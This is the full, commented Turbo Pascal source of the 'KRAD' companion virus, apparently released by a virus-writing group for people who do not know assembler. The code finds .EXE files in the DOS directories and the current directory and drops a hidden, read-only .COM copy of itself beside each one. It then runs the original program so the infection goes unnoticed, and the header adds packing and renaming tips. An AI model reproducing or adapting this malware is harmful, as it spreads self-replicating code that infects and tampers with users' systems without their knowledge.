Program KRAD; { Virus Laboratories and Distribution Proudly present the KRAD Virus Written by Metabolis for non assembler ppls Why call it the KRAD virus? Cos it is! A companion virus written in Turbo Pascal, well that just sums it up. I wrote this for two reasons.. 1) Not everyone knows assembler 2) a friend reckoned a virus couldn't be programmed in Turbo Pascal.. (by that he meant *I* couldn't do it). No matter how lame.. it's still a virus! (Right up there with Aids/ Number 1 :)) Fully commented for non understanding Pascal people, (a very small part of the world). Compress this with DIET/PkLite/LZEXE or something similar when it's compiled. Then rename it to a .COM file and hey presto, you can run it! I guess an added bonus of this virus is, if there's another companion virus on your system it won't overwrite it, it will take that as an infection and leave it alone. KRAD virus will immediately infect C:\DOS or C:\MSDOS if they exist, so if any DOS .EXE files are run it will infect all the files in the current dir that you ran the DOS command from. } Uses Dos,Crt; {Even if I don't use one of 'em.. it's best to include both. } {$M 59999,0,8000} {This program needs memory for two things.. 1) To use as a buffer when copying the virus 2) To execute the program originally run. } Var Inf,Inf2:Searchrec; {Used in the EXE and file_exist routines } Infected:Boolean; {Is a file infected? } Params:Byte; {Loop Index for adding all parameters together } All_Params:String; {This string contains the whole list of parameters originally passed to the program } P:PathStr; { Used by the FSplit procedure. } D:DirStr; { "" } N:NameStr; { "" } E:ExtStr; { "" } Procedure Check_Infected(Path:String); {Is the .EXE file we've found infected? } Begin FSplit(Inf.Name,D,N,E); {Split it up into directory, name and extension. } FindFirst(Path+N+'.COM',Anyfile,Inf2); {Look for the .COM file with the same file name, if this exists then the file is already infected. } Infected:=(DosError=0); {Set the Infected flag } End; Procedure CopyFile(SourceFile, TargetFile:string); {Straight Forward copying routine, I won't comment all of this.. } var Source, Target : file; BRead, Bwrite : word; FileBuf : array[1..2048] of char; Begin Assign(Source,SourceFile); SetFattr(Source,$20); {Set the file attributes of the hidden COM companion we're going to be copying to archive so that it's possible read it. } {$I-} Reset(Source,1); {$I+} If IOResult <> 0 then Begin Exit; {Couldn't open the source file! } End; Assign(Target,TargetFile); {$I-} Rewrite(Target,1); {$I+} If IOResult <> 0 then Begin Exit; {Couldn't open the target file! } End; Repeat BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead); BlockWrite(Target,FileBuf,Bread,Bwrite); Until (Bread = 0) or (Bread <> BWrite); Close(Source); Close(Target); SetFattr(Source,3); {Set the COM companion that we copied back to hidden and read-only. } SetFattr(Target,3); End; Procedure FaI(Path:String); {Find and Infect!} Begin FindFirst(Path+'*.EXE',AnyFile,Inf); {Check for .EXEs to infect! } While DosError=0 Do Begin Infected:=False; Check_Infected(Path); { Check if the .EXE found is already infected. } If Not Infected then Begin CopyFile(ParamStr(0),Path+N+'.COM'); End; { If the file isn't infected then copy the .COM version of the file you're executing to companionship with the .EXE you have found that isn't infected. } FindNext(Inf); End; End; Begin FaI('C:\DOS\'); { Find & Infect! Go for the DOS dirs first } FaI('C:\MSDOS\'); { because this is where most EXE files will } FaI(''); { be executed from! } FSplit(ParamStr(0),D,N,E); { Make sure we have the path and name of the file we actually want to execute. } All_Params:=''; { "Remember to initialise those variables!" - Teacher } For Params:=1 To ParamCount do All_Params:=All_Params+ParamStr(Params)+' '; Exec(D+N+'.EXE',All_Params); {Execute the file that the user wanted to in the first place keeping all original parameters. } End. {Easy wasn't it? I thought so.. }